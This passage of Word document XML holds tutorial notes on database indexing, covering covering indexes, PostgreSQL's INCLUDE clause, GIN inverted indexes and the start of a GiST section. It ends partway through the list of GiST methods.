    <w:p w14:paraId="3BC92A5A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="2F6A9E15" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Covering: CREATE INDEX ON users(age, name, email)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283F47DF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  → Index leaf nodes contain: age, name, email</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB5115A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  → Query entirely satisfied from index — no heap access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23676D48" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  → 10,000 matches, but from sequential index scan (much less I/O)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D836DA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  → name is in index — if index ordered by (age, name), no additional sort</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBD1EE9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The INCLUDE clause (PostgreSQL 11+, SQL Server):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6857C90D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Including extra columns in an index without making them part of the sort key:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC8F408" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A46977E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CREATE INDEX ON orders(customer_id) INCLUDE (order_date, amount, status);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612EACA4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- customer_id is the sort key (used for lookup)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A1F0AF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- order_date, amount, status are stored in leaf nodes only (not in internal nodes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9B5300" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Queries filtering on customer_id and selecting order_date/amount/status: no heap access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACBF047" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- order_date/amount/status are NOT usable as additional filter conditions via index scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCDC65C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why INCLUDE rather than making them key columns?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3F86EB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3927DADC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Full key: CREATE INDEX ON orders(customer_id, order_date, amount, status)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4903FC91" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Pros: all four columns usable as filter conditions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FD2DED" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Cons: larger internal nodes (all 4 columns in every node)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D7C279" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">        higher tree height possible (more data per entry = fewer per page)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674C92F1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">        larger index to maintain on writes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAE1278" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54078D83" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t>INCLUDE: CREATE INDEX ON orders(customer_id) INCLUDE (order_date, amount, status)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CCC79C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Pros: smaller internal nodes (only customer_id) → lower tree height</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B129087" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">        non-key columns don't need to be unique constraint contributors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623F5140" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">        slightly smaller total index size than full key approach</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321CE5A8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Cons: order_date/amount/status not usable as independent filter conditions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A33CF8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:pict w14:anchorId="0B7025F9">
          <v:rect id="_x0000_i5426" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2666AEE4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Specialized Index Types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C502E87" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GIN (Generalized Inverted Index) — Full-Text and Array Search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B15D8BF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What GIN indexes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5028D9D9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>GIN (Generalized Inverted Index) is designed for </w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>composite values</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> — columns containing multiple elements that should each be independently searchable. Primary use cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3A3817" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1490"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Full-text search (documents → word tokens)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3686B787" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1490"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Array columns (array elements)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693B8278" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1490"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>JSONB columns (JSON paths and values)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0919ED" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1490"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>tsvector (pre-tokenized full-text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173454E5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Internal structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA986B8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA21D27" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>GIN structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154558FB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Posting tree (B-Tree): keys are individual tokens/elements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207359BF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Each key → posting list: sorted list of document/row IDs containing that token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0446AF96" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="26CAADA3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>For full-text search:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48741D22" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Document: "The quick brown fox jumps over the lazy dog"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298E6FCE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Tokenization: [quick, brown, fox, jump, lazy, dog]  (stemmed, stopwords removed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5863EC21" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6693F8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  GIN index:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56474CBC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "brown"  → [doc_id_5, doc_id_12, doc_id_47, ...]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0857B89E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    "dog"    → [doc_id_1, doc_id_5, doc_id_89, ...]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28524397" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    "fox"    → [doc_id_3, doc_id_5, doc_id_22, ...]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F7C88D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    "jump"   → [doc_id_5, doc_id_67, ...]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD5BB1E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    "lazy"   → [doc_id_5, doc_id_44, ...]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147824F9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    "quick"  → [doc_id_5, doc_id_88, ...]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602F2B56" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="0C9E7C01" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Query: "fox AND lazy"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3707EC35" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Fetch posting list for "fox":  [3, 5, 22, ...]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FD8FC9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Fetch posting list for "lazy": [5, 44, ...]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B81E664" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Intersect: [5, ...]  ← O(posting_list_size) with sorted merge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31705209" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GIN vs B-Tree for array containment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D07F697" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758BD818" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Table: products(id, tags TEXT[])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EDF760" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Query: SELECT * FROM products WHERE tags @&gt; ARRAY['electronics', 'portable']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1437CBA9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="3B8CC532" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>B-Tree index on tags: useless (can't index arrays for containment queries)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2275EEDA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>GIN index on tags:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2158D2F3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  "electronics" → [product_5, product_12, product_88, ...]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A17F21" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  "portable"    → [product_5, product_22, product_47, ...]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39970070" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F88E4B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Query: intersect posting lists → products with BOTH tags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A77C9A3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GIN performance characteristics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307F2564" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CA497E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Build time: slower than B-Tree (must tokenize all values, sort posting lists)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23722A49" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Index size: can be larger than B-Tree (inverted index stores many posting lists)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCCFF3E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t>Query performance: very fast for containment/overlap queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C68EDB9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Update performance: SLOWER than B-Tree (inserting a document updates many posting lists)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1074CA52" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  → GIN uses a pending list (gin_pending_list_limit):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8265DB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">     new entries go to a small pending list, merged into main index during VACUUM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048A7A00" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">     or when pending list exceeds its size limit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F76F3CB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  → Reduces write amplification at cost of slightly slower queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21738984" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">     (must also check pending list on every query)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686F4D77" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GiST (Generalized Search Tree) — Geometric and Range Indexing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FBB722" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What GiST indexes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AD5238" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>GiST (Generalized Search Tree) is an extensible B-Tree variant that supports </w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>arbitrary data types</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> with user-defined search operators. Built-in support for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B37F108" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1491"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Geometric types (points, boxes, circles, polygons)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C268CB5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1491"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Range types (daterange, tsrange, numrange)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF0DC90" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1491"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Network types (inet, cidr)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4A4DDE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1491"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Full-text (tsvector — as alternative to GIN)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1999F10D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Internal mechanics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C14A6D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>GiST generalizes B-Tree by replacing the key ordering and comparison with user-defined </w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F51151C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A3A105" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Required GiST methods:</w:t>
      </w:r>
    </w:p>
